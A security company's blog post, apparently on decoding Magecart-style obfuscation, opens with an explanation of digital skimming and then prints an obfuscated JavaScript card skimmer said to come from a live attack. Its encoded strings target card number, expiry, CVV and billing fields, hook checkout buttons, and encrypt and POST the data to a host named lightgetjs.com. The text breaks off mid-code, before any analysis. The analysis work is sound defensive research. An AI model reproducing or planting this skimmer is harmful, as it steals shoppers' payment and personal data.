Tech & Engineering Blog

Analyzing Magecart Malware – From Zero to Hero

Guy Bary

January 15, 2020

Categories: Technology and Engineering

Analyzing Magecart Malware – From Zero to Hero

Javascript obfuscation is not a new trend, but it is widely used today to hide malware code in many websites. This post is for technical readers who want to understand Magecart’s common obfuscation pattern, and ways to decode it.

As websites get more and more complex, we see an increasing number of sites that are being compromised by malicious code injections, also commonly known as Magecart or digital skimming attacks. These attacks are designed to steal user data such as credit card numbers from websites, and if left unchecked, can result in significant data breaches and huge fines for the website owner.

Magecart attacks often go unnoticed for weeks, months or even years. One reason that they escape scrutiny is that the injected JavaScript code is heavily obfuscated, making it hard to detect malicious script actions and data leaking to unauthorized domains. However, a significant number of these obfuscated scripts seem to share a pattern.

Obfuscation

“the action of making something less clear and less easy to understand, especially intentionally” – Cambridge Dictionary

Take a look at this Magecart attack sample. This code steals credit card details from users and this sample is from an ongoing attack.

<span class="token keyword">var</span> _0x34d5 <span class="token operator">=</span> <span class="token punctuation">[</span>
  <span class="token string">"Q29udGVudC1UeXBl"</span><span class="token punctuation">,</span>
  <span class="token string">"YXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVk"</span><span class="token punctuation">,</span>
  <span class="token string">"c2V0UHVibGljS2V5"</span><span class="token punctuation">,</span>
  <span class="token string">"TUlJRUlqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0JBOEFNSUlFQ2dLQ0JBRUF3NTZoY3Z1R25QZHZaM0hGQWtLN1QyR2EweTJaS2hkdjJhVG9SU1BzbWtFRVAyR2RsY1FrTTY4a0VXeHliWXBDWG45eXg5OFJxTFNNYStDUjYvUkZKaFZMUVNLdHkrNm16U2IyTURSYitUVks3NWpCN1F5aGZ6TVdacFYySlBzdGFyMGxxRkxwR3owdFJIS1lTY1h0VnZnNWVUWThtcjZ0dXlZK0VHTEw1SFd3UzFqSnBtaHNEN0RxZGQ1TTkxbElRemVtTU5nNWp2RktNclNlU1NSQlFZR1lSRDFWekVremEra3A2UVdlS1ZocWVVL0xFdFlZYUU4SlRlWGwzV1E2UExVNmZleXJndlFrN0MxeEhmeEVTVWx2UVl6aFlsbmt0clVBTmxxQVRyQ2JyTGtDL0oyNWx0T08vY2lsb0xKV3I0TWFHbERWU01FS1ZLYTNsQUt6SlJoNUd4SkovWDB2M0hzT0hsVUR5aW5ZdlA0eGpBWXRnWFZoYVBLbldDelNndjV2eWpmdEczQWlmZHlsOVFLejRuejZKRS9lOXE2YjhhNGdCM25kNm4xVDlVdklpNXhpdHhzZHBPNDVwWm1uN0dXQTgxOUJORElTZHNIcEcvSG9LL080N2xZTXFoRHJHWVhoZ2oxZWNodmJLSXJOdGxZMGZmd1U3QzYxR1l5TGVLbzF1aWhkU0gvaUF3czZyY25iWXFNM0hXN3RibncyaDhOZm1haVVZcDF3ek1oZ0ozQ3grVHhjcXdGTU0wU01LajF1SHVsSWo0MTg0WVJFMW5weEl3T1VSd3FENnJNbko0WXZqMFl2ZnZMQmJJN1krZ1N3YTJoTHJqbEJwN0V6b3VqdjBaSjRyOWdhK3ZIQmpkVUNtcmlONVNla3RJaWd4R3hRbklaWG1MWTdVTExkdmtoNlY4N2VMVi83ODF3eW1YbmVPaEtTblN6TmdXRU5ZNERMTDcvdGdzUnVxQW9tb0xHa0phTEorWmpBZ29hMno3cXdkUFc4d3liMW12L29qL3hadzA2d3Z2NVZPZlhvTXBjcTFUMkxldjl4T2FuL0dkeGREUytLSlJkQkZYL1c4WS9Ydi9wM0ZRQUpCdS95QXVaM0RoMjh4V1FubE1WczJBazZWbGdGQTdoK1ljZjBvVkpLTno0WDllMExGNUc2TGtTWXgxU1ZMV1ZqNWQ4VkVXNnFhNnN0QStFRERURXhhTUt6Y2pjYzhSc09SUXN0TTkxR2MrbEYvaHA3NndTb0pFeGVBMjNYL1g3dXI0allrUlpueElZSWxxMnFxRkVqYko4WjdnUE0rQ25neXpJM2pnZmhaai9aeVJDaHFtNlc2dFRkRlppdU0wVFdZTExjTE1TUklVZ1E1ajU3SkFydXFiZ2VJOXZaYUR1My9GQzZwRXYvc2tqUDZBN09qcXcrdFBiRzFndkg0dmJjM21nQ3NjRVFZUXozQUFGTVduakZyR2dBU1hETzZGTDk5dkxkdXRsS3NKV01TU2RuMktUaFQ4a3luMTA5V0dUc0syeDg5MEFOU3JmQ01pQ2d4UWN1U2wzUGdFRUZ0Unh0MFNpVDQybDNSWmY0UEVncXFUMVlkSVZkYzV3Sm4xOVhWNkdubDJqWDRieGZmMjdyUUFneDRQVXFvL3V6dG8yeTFrNU42WXpVTFh5dFF4MEpNcXQ3MEFVVnRkZzg0S29uckpZMmY1YUxVM0pVTWVrUmM0bDE3dHJVU1J0alZhN2FZdXh0cGo3K2wvckcwTUtWM0ZYYS9TeE11WDVWcmM4Ky8xUkdKcy9HVFY3Q2VhcHcxUUFtWm9BVnhRSURBUUFC"</span><span class="token punctuation">,</span>
  <span class="token string">"ZW5jcnlwdA=="</span><span class="token punctuation">,</span>
  <span class="token string">"c2VuZA=="</span><span class="token punctuation">,</span>
  <span class="token string">"cGxhY2Vfb3JkZXI="</span><span class="token punctuation">,</span>
  <span class="token string">"cGxhY2Utb3JkZXI="</span><span class="token punctuation">,</span>
  <span class="token string">"cGF5bWVudC1idXR0b25zLWNvbnRhaW5lcg=="</span><span class="token punctuation">,</span>
  <span class="token string">"YmlsbGluZy1idXR0b25zLWNvbnRhaW5lcg=="</span><span class="token punctuation">,</span>
  <span class="token string">"cmV2aWV3LWJ1dHRvbnMtY29udGFpbmVy"</span><span class="token punctuation">,</span>
  <span class="token string">"bGVuZ3Ro"</span><span class="token punctuation">,</span>
  <span class="token string">"W2lkKj0n"</span><span class="token punctuation">,</span>
  <span class="token string">"cXVlcnlTZWxlY3RvckFsbA=="</span><span class="token punctuation">,</span>
  <span class="token string">"YWRkRXZlbnRMaXN0ZW5lcg=="</span><span class="token punctuation">,</span>
  <span class="token string">"Y2xpY2s="</span><span class="token punctuation">,</span>
  <span class="token string">"YnRuLWNoZWNrb3V0"</span><span class="token punctuation">,</span>
  <span class="token string">"W2NsYXNzKj0n"</span><span class="token punctuation">,</span>
  <span class="token string">"bG9hZA=="</span><span class="token punctuation">,</span>
  <span class="token string">"aG9zdG5hbWU="</span><span class="token punctuation">,</span>
  <span class="token string">"bG9jYXRpb24="</span><span class="token punctuation">,</span>
  <span class="token string">"aW5wdXQ="</span><span class="token punctuation">,</span>
  <span class="token string">"aW5kZXhPZg=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX251bWJlcg=="</span><span class="token punctuation">,</span>
  <span class="token string">"c3Vic3Ry"</span><span class="token punctuation">,</span>
  <span class="token string">"dm1fY2NfbnVtYmVy"</span><span class="token punctuation">,</span>
  <span class="token string">"Z2V0RWxlbWVudEJ5SWQ="</span><span class="token punctuation">,</span>
  <span class="token string">"dmFsdWU="</span><span class="token punctuation">,</span>
  <span class="token string">"dm1fZXhwaXJhdGlvbg=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2V4cGlyYXRpb24="</span><span class="token punctuation">,</span>
  <span class="token string">"dm1fZXhwaXJhdGlvbl95cg=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2V4cGlyYXRpb25feXI="</span><span class="token punctuation">,</span>
  <span class="token string">"dm1fY2NfY2lk"</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX2NpZA=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX2V4cF9tb250aA=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX2V4cF95ZWFy"</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX2N2dg=="</span><span class="token punctuation">,</span>
  <span class="token string">"Zmlyc3RuYW1l"</span><span class="token punctuation">,</span>
  <span class="token string">"bGFzdG5hbWU="</span><span class="token punctuation">,</span>
  <span class="token string">"ZW1haWw="</span><span class="token punctuation">,</span>
  <span class="token string">"c3RyZWV0MQ=="</span><span class="token punctuation">,</span>
  <span class="token string">"c3RyZWV0Mg=="</span><span class="token punctuation">,</span>
  <span class="token string">"Y2l0eQ=="</span><span class="token punctuation">,</span>
  <span class="token string">"cmVnaW9uX2lk"</span><span class="token punctuation">,</span>
  <span class="token string">"Y291bnRyeV9pZA=="</span><span class="token punctuation">,</span>
  <span class="token string">"cG9zdGNvZGU="</span><span class="token punctuation">,</span>
  <span class="token string">"dGVsZXBob25l"</span><span class="token punctuation">,</span>
  <span class="token string">"YmlsbGluZzo="</span><span class="token punctuation">,</span>
  <span class="token string">"c3RyaW5naWZ5"</span><span class="token punctuation">,</span>
  <span class="token string">"dHBzOi8vbGlnaHRnZXRqcy5jb20="</span><span class="token punctuation">,</span>
  <span class="token string">"b3Blbg=="</span><span class="token punctuation">,</span>
  <span class="token string">"UE9TVA=="</span><span class="token punctuation">,</span>
  <span class="token string">"c2V0UmVxdWVzdEhlYWRlcg=="</span><span class="token punctuation">,</span>
<span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">(</span><span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x110cd2<span class="token punctuation">,</span> _0xa263bd</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">var</span> <span class="token function-variable function">_0x352891</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x76a704</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token operator">--</span>_0x76a704<span class="token punctuation">)</span> <span class="token punctuation">{</span>
      _0x110cd2<span class="token punctuation">[</span><span class="token string">"push"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x110cd2<span class="token punctuation">[</span><span class="token string">"shift"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span><span class="token punctuation">;</span>
  <span class="token function">_0x352891</span><span class="token punctuation">(</span><span class="token operator">++</span>_0xa263bd<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">(</span>_0x34d5<span class="token punctuation">,</span> <span class="token number">0xa5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> <span class="token function-variable function">_0x47fb</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x522b23<span class="token punctuation">,</span> _0x4fa39c</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  _0x522b23 <span class="token operator">=</span> _0x522b23 <span class="token operator">-</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
  <span class="token keyword">var</span> _0xdb42df <span class="token operator">=</span> _0x34d5<span class="token punctuation">[</span>_0x522b23<span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x47fb<span class="token punctuation">[</span><span class="token string">"IyfmVK"</span><span class="token punctuation">]</span> <span class="token operator">===</span> <span class="token keyword">undefined</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token punctuation">(</span><span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      <span class="token keyword">var</span> <span class="token function-variable function">_0x28a5cc</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">var</span> _0x3f5c15<span class="token punctuation">;</span>
        <span class="token keyword">try</span> <span class="token punctuation">{</span>
          _0x3f5c15 <span class="token operator">=</span> <span class="token function">Function</span><span class="token punctuation">(</span><span class="token string">"returnx20(function()x20"</span> <span class="token operator">+</span> <span class="token string">"{}.constructor(x22returnx20thisx22)(x20)"</span> <span class="token operator">+</span> <span class="token string">");"</span><span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x7f7a59<span class="token punctuation">)</span> <span class="token punctuation">{</span>
          _0x3f5c15 <span class="token operator">=</span> window<span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        <span class="token keyword">return</span> _0x3f5c15<span class="token punctuation">;</span>
      <span class="token punctuation">}</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x1a2269 <span class="token operator">=</span> <span class="token function">_0x28a5cc</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x2009de <span class="token operator">=</span> <span class="token string">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="</span><span class="token punctuation">;</span>
      _0x1a2269<span class="token punctuation">[</span><span class="token string">"atob"</span><span class="token punctuation">]</span> <span class="token operator">||</span>
        <span class="token punctuation">(</span>_0x1a2269<span class="token punctuation">[</span><span class="token string">"atob"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x2633f6</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
          <span class="token keyword">var</span> _0x1bf8c8 <span class="token operator">=</span> <span class="token function">String</span><span class="token punctuation">(</span>_0x2633f6<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"replace"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">=+$</span><span class="token regex-delimiter">/</span></span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
          <span class="token keyword">for</span> <span class="token punctuation">(</span>
            <span class="token keyword">var</span> _0x4e57f1 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">,</span> _0x5122c7<span class="token punctuation">,</span> _0x5cb7d8<span class="token punctuation">,</span> _0x2540b4 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">,</span> _0x140365 <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
            <span class="token punctuation">(</span>_0x5cb7d8 <span class="token operator">=</span> _0x1bf8c8<span class="token punctuation">[</span><span class="token string">"charAt"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x2540b4<span class="token operator">++</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token operator">~</span>_0x5cb7d8 <span class="token operator">&&</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>_0x5122c7 <span class="token operator">=</span> _0x4e57f1 <span class="token operator">%</span> <span class="token number">0x4</span> <span class="token operator">?</span> _0x5122c7 <span class="token operator">*</span> <span class="token number">0x40</span> <span class="token operator">+</span> _0x5cb7d8 <span class="token operator">:</span> _0x5cb7d8<span class="token punctuation">)</span><span class="token punctuation">,</span> _0x4e57f1<span class="token operator">++</span> <span class="token operator">%</span> <span class="token number">0x4</span><span class="token punctuation">)</span>
              <span class="token operator">?</span> <span class="token punctuation">(</span>_0x140365 <span class="token operator">+=</span> String<span class="token punctuation">[</span><span class="token string">"fromCharCode"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">0xff</span> <span class="token operator">&</span> <span class="token punctuation">(</span>_0x5122c7 <span class="token operator">>></span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token operator">-</span><span class="token number">0x2</span> <span class="token operator">*</span> _0x4e57f1<span class="token punctuation">)</span> <span class="token operator">&</span> <span class="token number">0x6</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
              <span class="token operator">:</span> <span class="token number">0x0</span>
          <span class="token punctuation">)</span> <span class="token punctuation">{</span>
            _0x5cb7d8 <span class="token operator">=</span> _0x2009de<span class="token punctuation">[</span><span class="token string">"indexOf"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x5cb7d8<span class="token punctuation">)</span><span class="token punctuation">;</span>
          <span class="token punctuation">}</span>
          <span class="token keyword">return</span> _0x140365<span class="token punctuation">;</span>
        <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    _0x47fb<span class="token punctuation">[</span><span class="token string">"cJuRna"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x55fba5</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      <span class="token keyword">var</span> _0xfd7af3 <span class="token operator">=</span> <span class="token function">atob</span><span class="token punctuation">(</span>_0x55fba5<span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x953b7b <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x192361 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">,</span> _0x1f2b27 <span class="token operator">=</span> _0xfd7af3<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span> _0x192361 <span class="token operator"><</span> _0x1f2b27<span class="token punctuation">;</span> _0x192361<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x953b7b <span class="token operator">+=</span> <span class="token string">"%"</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">"00"</span> <span class="token operator">+</span> _0xfd7af3<span class="token punctuation">[</span><span class="token string">"charCodeAt"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x192361<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"toString"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"slice"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token operator">-</span><span class="token number">0x2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
      <span class="token keyword">return</span> <span class="token function">decodeURIComponent</span><span class="token punctuation">(</span>_0x953b7b<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">;</span>
    _0x47fb<span class="token punctuation">[</span><span class="token string">"naGzua"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token punctuation">}</span><span class="token punctuation">;</span>
    _0x47fb<span class="token punctuation">[</span><span class="token string">"IyfmVK"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token operator">!</span><span class="token operator">!</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
  <span class="token keyword">var</span> _0x11ff5c <span class="token operator">=</span> _0x47fb<span class="token punctuation">[</span><span class="token string">"naGzua"</span><span class="token punctuation">]</span><span class="token punctuation">[</span>_0x522b23<span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x11ff5c <span class="token operator">===</span> <span class="token keyword">undefined</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    _0xdb42df <span class="token operator">=</span> _0x47fb<span class="token punctuation">[</span><span class="token string">"cJuRna"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0xdb42df<span class="token punctuation">)</span><span class="token punctuation">;</span>
    _0x47fb<span class="token punctuation">[</span><span class="token string">"naGzua"</span><span class="token punctuation">]</span><span class="token punctuation">[</span>_0x522b23<span class="token punctuation">]</span> <span class="token operator">=</span> _0xdb42df<span class="token punctuation">;</span>
  <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
    _0xdb42df <span class="token operator">=</span> _0x11ff5c<span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
  <span class="token keyword">return</span> _0xdb42df<span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function">readyr</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x5bbf66 <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x0"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x3"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x4"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x8475c0 <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x2e623e <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x2e623e <span class="token operator"><</span> _0x8475c0<span class="token punctuation">;</span> _0x2e623e<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      f <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span>_0x2e623e<span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        k <span class="token operator">=</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x6"</span><span class="token punctuation">)</span> <span class="token operator">+</span> f <span class="token operator">+</span> <span class="token string">"x27]"</span><span class="token punctuation">;</span>
        <span class="token keyword">var</span> _0x7ddc45 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x7"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">,</span>
          _0x5d458a <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
        <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token punctuation">;</span> _0x5d458a <span class="token operator"><</span> _0x7ddc45<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span> _0x5d458a<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
          _0x7ddc45<span class="token punctuation">[</span>_0x5d458a<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x8"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x9"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> bts<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x375bef<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x36add6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x5bbf66 <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xa"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x8475c0 <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x2e623e <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x2e623e <span class="token operator"><</span> _0x8475c0<span class="token punctuation">;</span> _0x2e623e<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      f <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span>_0x2e623e<span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        k <span class="token operator">=</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xb"</span><span class="token punctuation">)</span> <span class="token operator">+</span> f <span class="token operator">+</span> <span class="token string">"x27]"</span><span class="token punctuation">;</span>
        <span class="token keyword">var</span> _0x7ddc45 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x7"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">,</span>
          _0x5d458a <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
        <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token punctuation">;</span> _0x5d458a <span class="token operator"><</span> _0x7ddc45<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span> _0x5d458a<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
          _0x7ddc45<span class="token punctuation">[</span>_0x5d458a<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x8"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x9"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> bts<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x24b4f5<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x196a93<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>

window<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x8"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xc"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> readyr<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">setInterval</span><span class="token punctuation">(</span>bts<span class="token punctuation">,</span> <span class="token number">0x7d0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> vvk <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function">bts</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x34f9e9 <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token punctuation">}</span><span class="token punctuation">;</span>
    _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xd"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> window<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xe"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xd"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x4a60b2 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x7"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xf"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x570cfd <span class="token operator">=</span> _0x4a60b2<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x57a5b3 <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
